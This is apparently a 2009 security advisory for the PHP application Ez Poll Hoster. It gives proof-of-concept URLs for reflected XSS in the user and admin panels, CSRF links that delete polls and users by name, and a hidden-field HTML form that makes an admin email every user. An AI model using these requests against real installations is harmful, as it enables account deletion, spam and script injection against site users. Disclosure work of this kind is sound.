Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities

🗓️ 14 Dec 2009 00:00:00Reported by RootType
Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities in PHP Applicatio

                                                [#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&amp;cat=Polls%20and%20Voting&amp;id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--User panel
 |  |--XSS in user panel
 |  |--Delete poll by name
 |
 |--Admin panel
    |--XSS in admin panel
    |--Delete user by name
    |--Email all users

[#]User panel

[-]XSS in user panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&amp;pid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete poll by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&amp;pid=[POLL
NAME]&amp;do=true&amp;is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[#]Admin panel

[-]XSS in admin panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&amp;uid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete user by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&amp;do=delete&amp;uid=[USER
NAME]&amp;is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[-]Email all users

[EXPLOIT------------------------------------------------------------------------------------------]
&lt;form action=&quot;http://localhost/eph/admin.php?action=email&amp;do=true&quot;
method=&quot;post&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;subject&quot; value=&quot;this is my subject&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;message&quot; value=&quot;this is my message&quot;&gt;
  &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot;&gt;
&lt;/form&gt;
[EXPLOIT------------------------------------------------------------------------------------------]

[#] EOF
14 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1